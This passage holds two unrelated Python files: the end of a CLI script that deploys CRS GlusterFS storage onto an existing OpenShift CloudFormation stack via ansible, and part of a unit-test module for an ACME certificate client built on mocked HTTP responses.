@click.option('--private-subnet-id1', help='Specify a Private subnet within the existing VPC',
              show_default=True)
@click.option('--private-subnet-id2', help='Specify a Private subnet within the existing VPC',
              show_default=True)
@click.option('--private-subnet-id3', help='Specify a Private subnet within the existing VPC',
              show_default=True)
@click.option('--glusterfs-volume-size', default='500', help='Gluster volume size in GB',
              show_default=True)
@click.option('--glusterfs-volume-type', default='st1', help='Gluster volume type',
              show_default=True)
@click.option('--bastion-sg', help='Specify the Bastion Security Group',
              show_default=True)
@click.option('--node-sg', help='Specify the Node Security Group',
              show_default=True)
@click.option('--vpc', help='Specify the existing VPC',
              show_default=True)
@click.option('--iops', help='Specify a numeric value for IOPS',
              show_default=True)
### DNS options
@click.option('--public-hosted-zone', help='hosted zone for accessing the environment')
### Subscription and Software options
@click.option('--rhsm-user', help='Red Hat Subscription Management User')
@click.option('--rhsm-password', help='Red Hat Subscription Management Password',
              hide_input=True,)
@click.option('--rhsm-pool', help='Red Hat Subscription Management Pool ID or Subscription Name for OpenShift')
### Miscellaneous options
@click.option('--existing-stack', help='Specify the name of the existing CloudFormation stack')
@click.option('--no-confirm', is_flag=True,
              help='Skip confirmation prompt')
@click.help_option('--help', '-h')
@click.option('-v', '--verbose', count=True)
def launch_refarch_env(region=None,
                       ami=None,
                       no_confirm=False,
                       node_instance_type=None,
                       glusterfs_stack_name=None,
                       keypair=None,
                       public_hosted_zone=None,
                       rhsm_user=None,
                       rhsm_password=None,
                       rhsm_pool=None,
                       node_type=None,
                       private_subnet_id1=None,
                       private_subnet_id2=None,
                       private_subnet_id3=None,
                       glusterfs_volume_type=None,
                       glusterfs_volume_size=None,
                       iops=None,
                       bastion_sg=None,
                       node_sg=None,
                       vpc=None,
                       existing_stack=None,
                       use_cloudformation_facts=False,
                       verbose=0):
    """Deploy CRS (container-ready storage) GlusterFS onto an existing
    OpenShift reference-architecture CloudFormation stack.

    Prompts for any option not supplied on the command line, echoes the
    resulting configuration for confirmation, then runs the
    infrastructure and add-crs ansible playbooks via ``os.system``.
    Returns the playbook's exit status on failure, ``None`` otherwise.
    """
    # Prompt for required values that were not supplied on the CLI.
    if public_hosted_zone is None:
        public_hosted_zone = click.prompt('Hosted DNS zone for accessing the environment')

    if existing_stack is None:
        existing_stack = click.prompt('Specify the name of the existing CloudFormation stack')

    if glusterfs_stack_name is None:
        glusterfs_stack_name = click.prompt('Specify a unique name for the CRS CloudFormation stack')

    # If no keypair is specified fail:
    if keypair is None:
        keypair = click.prompt('A SSH keypair must be specified or created')

    # Networking facts are either computed by CloudFormation
    # (--use-cloudformation-facts, OCP >= 3.5) or gathered interactively.
    if use_cloudformation_facts and bastion_sg is None:
        bastion_sg = "Computed by Cloudformations"
    elif bastion_sg is None:
        bastion_sg = click.prompt("Specify the Security Group of the Bastion?")

    if use_cloudformation_facts and node_sg is None:
        node_sg = "Computed by Cloudformations"
    elif node_sg is None:
        node_sg = click.prompt("Specify the Security Group of the Node?")

    if use_cloudformation_facts and vpc is None:
        vpc = "Computed by Cloudformations"
    elif vpc is None:
        vpc = click.prompt("Specify the existing VPC?")

    if use_cloudformation_facts and private_subnet_id1 is None:
        private_subnet_id1 = "Computed by Cloudformations"
    elif private_subnet_id1 is None:
        private_subnet_id1 = click.prompt("Specify the first private subnet for the nodes?")

    if use_cloudformation_facts and private_subnet_id2 is None:
        private_subnet_id2 = "Computed by Cloudformations"
    elif private_subnet_id2 is None:
        private_subnet_id2 = click.prompt("Specify the second private subnet for the nodes?")

    if use_cloudformation_facts and private_subnet_id3 is None:
        private_subnet_id3 = "Computed by Cloudformations"
    elif private_subnet_id3 is None:
        private_subnet_id3 = click.prompt("Specify the third private subnet for the nodes?")

    # If the user already provided values, don't bother asking again
    if rhsm_user is None:
        rhsm_user = click.prompt("RHSM username?")
    if rhsm_password is None:
        # BUG FIX: this previously assigned to a stray local `rhsm_pass`,
        # leaving rhsm_password as None in the generated ansible command.
        rhsm_password = click.prompt("RHSM password?", hide_input=True)
    if rhsm_pool is None:
        rhsm_pool = click.prompt("RHSM Pool ID or Subscription Name for OpenShift?")

    # io1 volumes require an explicit IOPS value; every other type uses "NA".
    if glusterfs_volume_type in ['io1']:
        iops = click.prompt('Specify a numeric value for iops')
    if iops is None:
        iops = "NA"

    # Hidden facts for infrastructure.yaml (add_node=no / deploy_crs=yes
    # are passed as literals in the command below).
    create_key = "no"
    create_vpc = "no"
    deploy_glusterfs = "false"

    # Display information to the user about their choices
    if use_cloudformation_facts:
        click.echo('Configured values:')
        click.echo('\tami: %s' % ami)
        click.echo('\tregion: %s' % region)
        click.echo('\tglusterfs_stack_name: %s' % glusterfs_stack_name)
        click.echo('\tglusterfs_volume_type: %s' % glusterfs_volume_type)
        click.echo('\tglusterfs_volume_size: %s' % glusterfs_volume_size)
        click.echo('\tiops: %s' % iops)
        click.echo('\tnode_instance_type: %s' % node_instance_type)
        click.echo('\tkeypair: %s' % keypair)
        click.echo('\tpublic_hosted_zone: %s' % public_hosted_zone)
        click.echo('\trhsm_user: %s' % rhsm_user)
        click.echo('\trhsm_password: *******')
        click.echo('\trhsm_pool: %s' % rhsm_pool)
        click.echo('\texisting_stack: %s' % existing_stack)
        click.echo('\tSubnets and Security Groups will be gather from the CloudFormation')
        click.echo("")
    else:
        click.echo('Configured values:')
        click.echo('\tami: %s' % ami)
        click.echo('\tregion: %s' % region)
        click.echo('\tglusterfs_stack_name: %s' % glusterfs_stack_name)
        click.echo('\tprivate_subnet_id1: %s' % private_subnet_id1)
        click.echo('\tprivate_subnet_id2: %s' % private_subnet_id2)
        click.echo('\tprivate_subnet_id3: %s' % private_subnet_id3)
        click.echo('\tglusterfs_volume_type: %s' % glusterfs_volume_type)
        click.echo('\tglusterfs_volume_size: %s' % glusterfs_volume_size)
        click.echo('\tiops: %s' % iops)
        click.echo('\tnode_instance_type: %s' % node_instance_type)
        click.echo('\tbastion_sg: %s' % bastion_sg)
        click.echo('\tnode_sg: %s' % node_sg)
        click.echo('\tvpc: %s' % vpc)
        click.echo('\tkeypair: %s' % keypair)
        click.echo('\tpublic_hosted_zone: %s' % public_hosted_zone)
        click.echo('\trhsm_user: %s' % rhsm_user)
        click.echo('\trhsm_password: *******')
        click.echo('\trhsm_pool: %s' % rhsm_pool)
        click.echo('\texisting_stack: %s' % existing_stack)
        click.echo("")

    if not no_confirm:
        click.confirm('Continue using these values?', abort=True)

    playbooks = ['playbooks/infrastructure.yaml', 'playbooks/add-crs.yaml']

    # Hide inventory-cache output unless in verbose mode (loop-invariant,
    # so computed once before the playbook loop).
    devnull = '' if verbose > 0 else '> /dev/null'

    for playbook in playbooks:
        # refresh the inventory cache to prevent stale hosts from
        # interfering with re-running
        command = 'inventory/aws/hosts/ec2.py --refresh-cache %s' % (devnull)
        os.system(command)

        # remove any cached facts to prevent stale data during a re-run
        command = 'rm -rf .ansible/cached_facts'
        os.system(command)

        if use_cloudformation_facts:
            command = (
                'ansible-playbook -i inventory/aws/hosts -e \'region=%s '
                'ami=%s '
                'keypair=%s '
                'glusterfs_stack_name=%s '
                'add_node=no '
                'deploy_crs=yes '
                'node_instance_type=%s '
                'public_hosted_zone=%s '
                'rhsm_user=%s '
                'rhsm_password=%s '
                'rhsm_pool="%s" '
                'key_path=/dev/null '
                'create_key=%s '
                'create_vpc=%s '
                'glusterfs_volume_type=%s '
                'glusterfs_volume_size=%s '
                'deploy_glusterfs=%s '
                'iops=%s '
                'stack_name=%s \' %s' % (
                    region, ami, keypair, glusterfs_stack_name,
                    node_instance_type, public_hosted_zone, rhsm_user,
                    rhsm_password, rhsm_pool, create_key, create_vpc,
                    glusterfs_volume_type, glusterfs_volume_size,
                    deploy_glusterfs, iops, existing_stack, playbook))
        else:
            command = (
                'ansible-playbook -i inventory/aws/hosts -e \'region=%s '
                'ami=%s '
                'keypair=%s '
                'glusterfs_stack_name=%s '
                'add_node=no '
                'deploy_crs=yes '
                'node_instance_type=%s '
                'private_subnet_id1=%s '
                'private_subnet_id2=%s '
                'private_subnet_id3=%s '
                'public_hosted_zone=%s '
                'rhsm_user=%s '
                'rhsm_password=%s '
                'rhsm_pool="%s" '
                'key_path=/dev/null '
                'create_key=%s '
                'create_vpc=%s '
                'glusterfs_volume_type=%s '
                'glusterfs_volume_size=%s '
                'deploy_glusterfs=%s '
                'iops=%s '
                'bastion_sg=%s '
                'node_sg=%s '
                'vpc=%s '
                'stack_name=%s \' %s' % (
                    region, ami, keypair, glusterfs_stack_name,
                    node_instance_type, private_subnet_id1,
                    private_subnet_id2, private_subnet_id3,
                    public_hosted_zone, rhsm_user, rhsm_password, rhsm_pool,
                    create_key, create_vpc, glusterfs_volume_type,
                    glusterfs_volume_size, deploy_glusterfs, iops,
                    bastion_sg, node_sg, vpc, existing_stack, playbook))

        if verbose > 0:
            command += " -" + "".join(['v'] * verbose)

        click.echo('We are running: %s' % command)
        status = os.system(command)
        # Propagate a non-zero playbook exit status to the caller.
        if os.WIFEXITED(status) and os.WEXITSTATUS(status) != 0:
            return os.WEXITSTATUS(status)
if __name__ == '__main__':
    # check for AWS access info: the ec2 inventory script and the AWS
    # ansible modules read credentials from the environment.
    if os.getenv('AWS_ACCESS_KEY_ID') is None or os.getenv('AWS_SECRET_ACCESS_KEY') is None:
        # Parenthesized single-argument print is valid in Python 2 and 3
        # (the original bare print statement was Python-2-only).
        print('AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY **MUST** be exported as environment variables.')
        sys.exit(1)
    launch_refarch_env(auto_envvar_prefix='OSE_REFArch')
|
|
"""Tests for acme.client."""
import datetime
import json
import unittest
from six.moves import http_client # pylint: disable=import-error
import mock
import requests
from acme import challenges
from acme import errors
from acme import jose
from acme import jws as acme_jws
from acme import messages
from acme import messages_test
from acme import test_util
# Shared test fixtures loaded from the acme test-data vectors: a DER-encoded
# certificate and two RSA account keys (the second is used to simulate a
# server returning a registration with the wrong key).
CERT_DER = test_util.load_vector('cert.der')
KEY = jose.JWKRSA.load(test_util.load_vector('rsa512_key.pem'))
KEY2 = jose.JWKRSA.load(test_util.load_vector('rsa256_key.pem'))
class ClientTest(unittest.TestCase):
    """Tests for acme.client.Client."""
    # pylint: disable=too-many-instance-attributes,too-many-public-methods

    def setUp(self):
        # All HTTP is mocked: `self.net` stands in for ClientNetwork and
        # always returns `self.response`, which individual tests mutate.
        self.response = mock.MagicMock(
            ok=True, status_code=http_client.OK, headers={}, links={})
        self.net = mock.MagicMock()
        self.net.post.return_value = self.response
        self.net.get.return_value = self.response

        self.directory = messages.Directory({
            messages.NewRegistration:
                'https://www.letsencrypt-demo.org/acme/new-reg',
            messages.Revocation:
                'https://www.letsencrypt-demo.org/acme/revoke-cert',
        })

        from acme.client import Client
        self.client = Client(
            directory=self.directory, key=KEY, alg=jose.RS256, net=self.net)

        self.identifier = messages.Identifier(
            typ=messages.IDENTIFIER_FQDN, value='example.com')

        # Registration
        self.contact = ('mailto:cert-admin@example.com', 'tel:+12025551212')
        reg = messages.Registration(
            contact=self.contact, key=KEY.public_key())
        self.new_reg = messages.NewRegistration(**dict(reg))
        self.regr = messages.RegistrationResource(
            body=reg, uri='https://www.letsencrypt-demo.org/acme/reg/1',
            new_authzr_uri='https://www.letsencrypt-demo.org/acme/new-reg',
            terms_of_service='https://www.letsencrypt-demo.org/tos')

        # Authorization
        authzr_uri = 'https://www.letsencrypt-demo.org/acme/authz/1'
        challb = messages.ChallengeBody(
            uri=(authzr_uri + '/1'), status=messages.STATUS_VALID,
            chall=challenges.DNS(token=jose.b64decode(
                'evaGxfADs6pSRb2LAv9IZf17Dt3juxGJ-PCt92wr-oA')))
        self.challr = messages.ChallengeResource(
            body=challb, authzr_uri=authzr_uri)
        self.authz = messages.Authorization(
            identifier=messages.Identifier(
                typ=messages.IDENTIFIER_FQDN, value='example.com'),
            challenges=(challb,), combinations=None)
        self.authzr = messages.AuthorizationResource(
            body=self.authz, uri=authzr_uri,
            new_cert_uri='https://www.letsencrypt-demo.org/acme/new-cert')

        # Request issuance
        self.certr = messages.CertificateResource(
            body=messages_test.CERT, authzrs=(self.authzr,),
            uri='https://www.letsencrypt-demo.org/acme/cert/1',
            cert_chain_uri='https://www.letsencrypt-demo.org/ca')

    def test_init_downloads_directory(self):
        # Passing a URI (not a Directory) makes the constructor fetch it.
        uri = 'http://www.letsencrypt-demo.org/directory'
        from acme.client import Client
        self.client = Client(
            directory=uri, key=KEY, alg=jose.RS256, net=self.net)
        self.net.get.assert_called_once_with(uri)

    def test_register(self):
        # "Instance of 'Field' has no to_json/update member" bug:
        # pylint: disable=no-member
        self.response.status_code = http_client.CREATED
        self.response.json.return_value = self.regr.body.to_json()
        self.response.headers['Location'] = self.regr.uri
        self.response.links.update({
            'next': {'url': self.regr.new_authzr_uri},
            'terms-of-service': {'url': self.regr.terms_of_service},
        })
        self.assertEqual(self.regr, self.client.register(self.new_reg))
        # TODO: test POST call arguments

        # TODO: split here and separate test
        # Server echoing back a registration with a different key must be
        # rejected as an unexpected update.
        reg_wrong_key = self.regr.body.update(key=KEY2.public_key())
        self.response.json.return_value = reg_wrong_key.to_json()
        self.assertRaises(
            errors.UnexpectedUpdate, self.client.register, self.new_reg)

    def test_register_missing_next(self):
        self.response.status_code = http_client.CREATED
        self.assertRaises(
            errors.ClientError, self.client.register, self.new_reg)

    def test_update_registration(self):
        # "Instance of 'Field' has no to_json/update member" bug:
        # pylint: disable=no-member
        self.response.headers['Location'] = self.regr.uri
        self.response.json.return_value = self.regr.body.to_json()
        self.assertEqual(self.regr, self.client.update_registration(self.regr))
        # TODO: test POST call arguments

        # TODO: split here and separate test
        self.response.json.return_value = self.regr.body.update(
            contact=()).to_json()
        self.assertRaises(
            errors.UnexpectedUpdate, self.client.update_registration, self.regr)

    def test_query_registration(self):
        self.response.json.return_value = self.regr.body.to_json()
        self.assertEqual(self.regr, self.client.query_registration(self.regr))

    def test_query_registration_updates_new_authzr_uri(self):
        self.response.json.return_value = self.regr.body.to_json()
        self.response.links = {'next': {'url': 'UPDATED'}}
        self.assertEqual(
            'UPDATED',
            self.client.query_registration(self.regr).new_authzr_uri)

    def test_agree_to_tos(self):
        # agree_to_tos should re-submit the registration with `agreement`
        # set to the TOS URI from the resource.
        self.client.update_registration = mock.Mock()
        self.client.agree_to_tos(self.regr)
        regr = self.client.update_registration.call_args[0][0]
        self.assertEqual(self.regr.terms_of_service, regr.body.agreement)

    def test_request_challenges(self):
        self.response.status_code = http_client.CREATED
        self.response.headers['Location'] = self.authzr.uri
        self.response.json.return_value = self.authz.to_json()
        self.response.links = {
            'next': {'url': self.authzr.new_cert_uri},
        }
        self.client.request_challenges(self.identifier, self.authzr.uri)
        # TODO: test POST call arguments

        # TODO: split here and separate test
        # A response for a different identifier is an unexpected update.
        self.response.json.return_value = self.authz.update(
            identifier=self.identifier.update(value='foo')).to_json()
        self.assertRaises(
            errors.UnexpectedUpdate, self.client.request_challenges,
            self.identifier, self.authzr.uri)

    def test_request_challenges_missing_next(self):
        self.response.status_code = http_client.CREATED
        self.assertRaises(
            errors.ClientError, self.client.request_challenges,
            self.identifier, self.regr)

    def test_request_domain_challenges(self):
        # request_domain_challenges is a thin convenience wrapper around
        # request_challenges for FQDN identifiers.
        self.client.request_challenges = mock.MagicMock()
        self.assertEqual(
            self.client.request_challenges(self.identifier),
            self.client.request_domain_challenges('example.com', self.regr))

    def test_answer_challenge(self):
        self.response.links['up'] = {'url': self.challr.authzr_uri}
        self.response.json.return_value = self.challr.body.to_json()
        chall_response = challenges.DNSResponse(validation=None)
        self.client.answer_challenge(self.challr.body, chall_response)

        # TODO: split here and separate test
        self.assertRaises(errors.UnexpectedUpdate, self.client.answer_challenge,
                          self.challr.body.update(uri='foo'), chall_response)

    def test_answer_challenge_missing_next(self):
        self.assertRaises(
            errors.ClientError, self.client.answer_challenge,
            self.challr.body, challenges.DNSResponse(validation=None))

    def test_retry_after_date(self):
        # HTTP-date form of Retry-After.
        self.response.headers['Retry-After'] = 'Fri, 31 Dec 1999 23:59:59 GMT'
        self.assertEqual(
            datetime.datetime(1999, 12, 31, 23, 59, 59),
            self.client.retry_after(response=self.response, default=10))

    @mock.patch('acme.client.datetime')
    def test_retry_after_invalid(self, dt_mock):
        # Unparseable Retry-After falls back to now + default seconds.
        dt_mock.datetime.now.return_value = datetime.datetime(2015, 3, 27)
        dt_mock.timedelta = datetime.timedelta

        self.response.headers['Retry-After'] = 'foooo'
        self.assertEqual(
            datetime.datetime(2015, 3, 27, 0, 0, 10),
            self.client.retry_after(response=self.response, default=10))

    @mock.patch('acme.client.datetime')
    def test_retry_after_seconds(self, dt_mock):
        # Integer-seconds form of Retry-After.
        dt_mock.datetime.now.return_value = datetime.datetime(2015, 3, 27)
        dt_mock.timedelta = datetime.timedelta

        self.response.headers['Retry-After'] = '50'
        self.assertEqual(
            datetime.datetime(2015, 3, 27, 0, 0, 50),
            self.client.retry_after(response=self.response, default=10))

    @mock.patch('acme.client.datetime')
    def test_retry_after_missing(self, dt_mock):
        # No Retry-After header: now + default seconds.
        dt_mock.datetime.now.return_value = datetime.datetime(2015, 3, 27)
        dt_mock.timedelta = datetime.timedelta

        self.assertEqual(
            datetime.datetime(2015, 3, 27, 0, 0, 10),
            self.client.retry_after(response=self.response, default=10))

    def test_poll(self):
        self.response.json.return_value = self.authzr.body.to_json()
        self.assertEqual((self.authzr, self.response),
                         self.client.poll(self.authzr))

        # TODO: split here and separate test
        self.response.json.return_value = self.authz.update(
            identifier=self.identifier.update(value='foo')).to_json()
        self.assertRaises(
            errors.UnexpectedUpdate, self.client.poll, self.authzr)

    def test_request_issuance(self):
        self.response.content = CERT_DER
        self.response.headers['Location'] = self.certr.uri
        self.response.links['up'] = {'url': self.certr.cert_chain_uri}
        self.assertEqual(self.certr, self.client.request_issuance(
            messages_test.CSR, (self.authzr,)))
        # TODO: check POST args

    def test_request_issuance_missing_up(self):
        # Without an 'up' link the chain URI is left unset.
        self.response.content = CERT_DER
        self.response.headers['Location'] = self.certr.uri
        self.assertEqual(
            self.certr.update(cert_chain_uri=None),
            self.client.request_issuance(messages_test.CSR, (self.authzr,)))

    def test_request_issuance_missing_location(self):
        self.assertRaises(
            errors.ClientError, self.client.request_issuance,
            messages_test.CSR, (self.authzr,))

    @mock.patch('acme.client.datetime')
    @mock.patch('acme.client.time')
    def test_poll_and_request_issuance(self, time_mock, dt_mock):
        # Simulated wall clock: time.sleep advances it, datetime.now reads
        # it, so the scheduling logic runs deterministically and instantly.
        # clock.dt | pylint: disable=no-member
        clock = mock.MagicMock(dt=datetime.datetime(2015, 3, 27))

        def sleep(seconds):
            """increment clock"""
            clock.dt += datetime.timedelta(seconds=seconds)
        time_mock.sleep.side_effect = sleep

        def now():
            """return current clock value"""
            return clock.dt
        dt_mock.datetime.now.side_effect = now
        dt_mock.timedelta = datetime.timedelta

        def poll(authzr):  # pylint: disable=missing-docstring
            # record poll start time based on the current clock value
            authzr.times.append(clock.dt)
            # suppose it takes 2 seconds for server to produce the
            # result, increment clock
            clock.dt += datetime.timedelta(seconds=2)
            if len(authzr.retries) == 1:  # no more retries
                done = mock.MagicMock(uri=authzr.uri, times=authzr.times)
                done.body.status = authzr.retries[0]
                return done, []
            # response (2nd result tuple element) is reduced to only
            # Retry-After header contents represented as integer
            # seconds; authzr.retries is a list of Retry-After
            # headers, head(retries) is peeled of as a current
            # Retry-After header, and tail(retries) is persisted for
            # later poll() calls
            return (mock.MagicMock(retries=authzr.retries[1:],
                                   uri=authzr.uri + '.', times=authzr.times),
                    authzr.retries[0])
        self.client.poll = mock.MagicMock(side_effect=poll)

        mintime = 7

        def retry_after(response, default):
            # pylint: disable=missing-docstring
            # check that poll_and_request_issuance correctly passes mintime
            self.assertEqual(default, mintime)
            return clock.dt + datetime.timedelta(seconds=response)
        self.client.retry_after = mock.MagicMock(side_effect=retry_after)

        def request_issuance(csr, authzrs):  # pylint: disable=missing-docstring
            return csr, authzrs
        self.client.request_issuance = mock.MagicMock(
            side_effect=request_issuance)

        csr = mock.MagicMock()
        authzrs = (
            mock.MagicMock(uri='a', times=[], retries=(
                8, 20, 30, messages.STATUS_VALID)),
            mock.MagicMock(uri='b', times=[], retries=(
                5, messages.STATUS_VALID)),
        )

        cert, updated_authzrs = self.client.poll_and_request_issuance(
            csr, authzrs, mintime=mintime,
            # make sure that max_attempts is per-authorization, rather
            # than global
            max_attempts=max(len(authzrs[0].retries), len(authzrs[1].retries)))
        self.assertTrue(cert[0] is csr)
        self.assertTrue(cert[1] is updated_authzrs)
        self.assertEqual(updated_authzrs[0].uri, 'a...')
        self.assertEqual(updated_authzrs[1].uri, 'b.')
        self.assertEqual(updated_authzrs[0].times, [
            datetime.datetime(2015, 3, 27),
            # a is scheduled for 10, but b is polling [9..11), so it
            # will be picked up as soon as b is finished, without
            # additional sleeping
            datetime.datetime(2015, 3, 27, 0, 0, 11),
            datetime.datetime(2015, 3, 27, 0, 0, 33),
            datetime.datetime(2015, 3, 27, 0, 1, 5),
        ])
        self.assertEqual(updated_authzrs[1].times, [
            datetime.datetime(2015, 3, 27, 0, 0, 2),
            datetime.datetime(2015, 3, 27, 0, 0, 9),
        ])
        self.assertEqual(clock.dt, datetime.datetime(2015, 3, 27, 0, 1, 7))

        # CA sets invalid | TODO: move to a separate test
        invalid_authzr = mock.MagicMock(
            times=[], retries=[messages.STATUS_INVALID])
        self.assertRaises(
            errors.PollError, self.client.poll_and_request_issuance,
            csr, authzrs=(invalid_authzr,), mintime=mintime)

        # exceeded max_attemps | TODO: move to a separate test
        self.assertRaises(
            errors.PollError, self.client.poll_and_request_issuance,
            csr, authzrs, mintime=mintime, max_attempts=2)

    def test_check_cert(self):
        self.response.headers['Location'] = self.certr.uri
        self.response.content = CERT_DER
        self.assertEqual(self.certr.update(body=messages_test.CERT),
                         self.client.check_cert(self.certr))

        # TODO: split here and separate test
        self.response.headers['Location'] = 'foo'
        self.assertRaises(
            errors.UnexpectedUpdate, self.client.check_cert, self.certr)

    def test_check_cert_missing_location(self):
        self.response.content = CERT_DER
        self.assertRaises(
            errors.ClientError, self.client.check_cert, self.certr)

    def test_refresh(self):
        # refresh delegates to check_cert.
        self.client.check_cert = mock.MagicMock()
        self.assertEqual(
            self.client.check_cert(self.certr), self.client.refresh(self.certr))

    def test_fetch_chain_no_up_link(self):
        self.assertEqual([], self.client.fetch_chain(self.certr.update(
            cert_chain_uri=None)))

    def test_fetch_chain_single(self):
        # pylint: disable=protected-access
        self.client._get_cert = mock.MagicMock()
        self.client._get_cert.return_value = (
            mock.MagicMock(links={}), "certificate")
        self.assertEqual([self.client._get_cert(self.certr.cert_chain_uri)[1]],
                         self.client.fetch_chain(self.certr))

    def test_fetch_chain_max(self):
        # A chain of exactly max_length is accepted.
        # pylint: disable=protected-access
        up_response = mock.MagicMock(links={'up': {'url': 'http://cert'}})
        noup_response = mock.MagicMock(links={})
        self.client._get_cert = mock.MagicMock()
        self.client._get_cert.side_effect = [
            (up_response, "cert")] * 9 + [(noup_response, "last_cert")]
        chain = self.client.fetch_chain(self.certr, max_length=10)
        self.assertEqual(chain, ["cert"] * 9 + ["last_cert"])

    def test_fetch_chain_too_many(self):  # recursive
        # An 'up' link that never terminates must raise instead of looping.
        # pylint: disable=protected-access
        response = mock.MagicMock(links={'up': {'url': 'http://cert'}})
        self.client._get_cert = mock.MagicMock()
        self.client._get_cert.return_value = (response, "certificate")
        self.assertRaises(errors.Error, self.client.fetch_chain, self.certr)

    def test_revoke(self):
        self.client.revoke(self.certr.body)
        self.net.post.assert_called_once_with(
            self.directory[messages.Revocation], mock.ANY, content_type=None)

    def test_revoke_bad_status_raises_error(self):
        self.response.status_code = http_client.METHOD_NOT_ALLOWED
        self.assertRaises(errors.ClientError, self.client.revoke, self.certr)
class ClientNetworkTest(unittest.TestCase):
    """Tests for acme.client.ClientNetwork."""

    def setUp(self):
        # verify_ssl is an opaque sentinel: tests only check it is passed
        # through to requests unchanged.
        self.verify_ssl = mock.MagicMock()
        self.wrap_in_jws = mock.MagicMock(return_value=mock.sentinel.wrapped)

        from acme.client import ClientNetwork
        self.net = ClientNetwork(
            key=KEY, alg=jose.RS256, verify_ssl=self.verify_ssl,
            user_agent='acme-python-test')

        self.response = mock.MagicMock(ok=True, status_code=http_client.OK)
        self.response.headers = {}
        self.response.links = {}

    def test_init(self):
        self.assertTrue(self.net.verify_ssl is self.verify_ssl)

    def test_wrap_in_jws(self):
        # Minimal serializable stand-in for a message object.
        class MockJSONDeSerializable(jose.JSONDeSerializable):
            # pylint: disable=missing-docstring
            def __init__(self, value):
                self.value = value

            def to_partial_json(self):
                return {'foo': self.value}

            @classmethod
            def from_json(cls, value):
                pass  # pragma: no cover

        # pylint: disable=protected-access
        jws_dump = self.net._wrap_in_jws(
            MockJSONDeSerializable('foo'), nonce=b'Tg')
        jws = acme_jws.JWS.json_loads(jws_dump)
        self.assertEqual(json.loads(jws.payload.decode()), {'foo': 'foo'})
        self.assertEqual(jws.signature.combined.nonce, b'Tg')

    def test_check_response_not_ok_jobj_no_error(self):
        self.response.ok = False
        self.response.json.return_value = {}
        # pylint: disable=protected-access
        self.assertRaises(
            errors.ClientError, self.net._check_response, self.response)

    def test_check_response_not_ok_jobj_error(self):
        # A well-formed problem document is surfaced as messages.Error.
        self.response.ok = False
        self.response.json.return_value = messages.Error(
            detail='foo', typ='serverInternal', title='some title').to_json()
        # pylint: disable=protected-access
        self.assertRaises(
            messages.Error, self.net._check_response, self.response)

    def test_check_response_not_ok_no_jobj(self):
        self.response.ok = False
        self.response.json.side_effect = ValueError
        # pylint: disable=protected-access
        self.assertRaises(
            errors.ClientError, self.net._check_response, self.response)

    def test_check_response_ok_no_jobj_ct_required(self):
        # JSON content type requested but body is not JSON: error.
        self.response.json.side_effect = ValueError
        for response_ct in [self.net.JSON_CONTENT_TYPE, 'foo']:
            self.response.headers['Content-Type'] = response_ct
            # pylint: disable=protected-access
            self.assertRaises(
                errors.ClientError, self.net._check_response, self.response,
                content_type=self.net.JSON_CONTENT_TYPE)

    def test_check_response_ok_no_jobj_no_ct(self):
        # No required content type: non-JSON body is acceptable.
        self.response.json.side_effect = ValueError
        for response_ct in [self.net.JSON_CONTENT_TYPE, 'foo']:
            self.response.headers['Content-Type'] = response_ct
            # pylint: disable=protected-access,no-value-for-parameter
            self.assertEqual(
                self.response, self.net._check_response(self.response))

    def test_check_response_jobj(self):
        self.response.json.return_value = {}
        for response_ct in [self.net.JSON_CONTENT_TYPE, 'foo']:
            self.response.headers['Content-Type'] = response_ct
            # pylint: disable=protected-access,no-value-for-parameter
            self.assertEqual(
                self.response, self.net._check_response(self.response))

    @mock.patch('acme.client.requests')
    def test_send_request(self, mock_requests):
        mock_requests.request.return_value = self.response
        # pylint: disable=protected-access
        self.assertEqual(self.response, self.net._send_request(
            'HEAD', 'url', 'foo', bar='baz'))
        mock_requests.request.assert_called_once_with(
            'HEAD', 'url', 'foo', verify=mock.ANY, bar='baz', headers=mock.ANY)

    @mock.patch('acme.client.requests')
    def test_send_request_verify_ssl(self, mock_requests):
        # pylint: disable=protected-access
        for verify in True, False:
            mock_requests.request.reset_mock()
            mock_requests.request.return_value = self.response
            self.net.verify_ssl = verify
            # pylint: disable=protected-access
            self.assertEqual(
                self.response, self.net._send_request('GET', 'url'))
            mock_requests.request.assert_called_once_with(
                'GET', 'url', verify=verify, headers=mock.ANY)

    @mock.patch('acme.client.requests')
    def test_send_request_user_agent(self, mock_requests):
        # Default User-Agent is added; a caller-supplied one wins.
        mock_requests.request.return_value = self.response
        # pylint: disable=protected-access
        self.net._send_request('GET', 'url', headers={'bar': 'baz'})
        mock_requests.request.assert_called_once_with(
            'GET', 'url', verify=mock.ANY,
            headers={'User-Agent': 'acme-python-test', 'bar': 'baz'})

        self.net._send_request('GET', 'url', headers={'User-Agent': 'foo2'})
        mock_requests.request.assert_called_with(
            'GET', 'url', verify=mock.ANY, headers={'User-Agent': 'foo2'})

    @mock.patch('acme.client.requests')
    def test_requests_error_passthrough(self, mock_requests):
        # Transport-level exceptions propagate to the caller unwrapped.
        mock_requests.exceptions = requests.exceptions
        mock_requests.request.side_effect = requests.exceptions.RequestException
        # pylint: disable=protected-access
        self.assertRaises(requests.exceptions.RequestException,
                          self.net._send_request, 'GET', 'uri')
class ClientNetworkWithMockedResponseTest(unittest.TestCase):
    """Tests for acme.client.ClientNetwork which mock out response."""
    # pylint: disable=too-many-instance-attributes

    def setUp(self):
        from acme.client import ClientNetwork
        self.net = ClientNetwork(key=None, alg=None)

        self.response = mock.MagicMock(ok=True, status_code=http_client.OK)
        self.response.headers = {}
        self.response.links = {}
        self.checked_response = mock.MagicMock()
        self.obj = mock.MagicMock()
        self.wrapped_obj = mock.MagicMock()
        self.content_type = mock.sentinel.content_type

        # Two pre-loaded nonces; each fake request pops one until the supply
        # is exhausted, after which no Replay-Nonce header is returned.
        self.all_nonces = [jose.b64encode(b'Nonce'), jose.b64encode(b'Nonce2')]
        self.available_nonces = self.all_nonces[:]

        def send_request(*args, **kwargs):
            # pylint: disable=unused-argument,missing-docstring
            if self.available_nonces:
                self.response.headers = {
                    self.net.REPLAY_NONCE_HEADER:
                        self.available_nonces.pop().decode()}
            else:
                self.response.headers = {}
            return self.response

        # Replace the network internals with the instrumented fakes above.
        # pylint: disable=protected-access
        self.net._send_request = self.send_request = mock.MagicMock(
            side_effect=send_request)
        self.net._check_response = self.check_response
        self.net._wrap_in_jws = mock.MagicMock(return_value=self.wrapped_obj)

    def check_response(self, response, content_type):
        # pylint: disable=missing-docstring
        self.assertEqual(self.response, response)
        self.assertEqual(self.content_type, content_type)
        return self.checked_response

    def test_head(self):
        # head() returns the raw response and forwards args untouched.
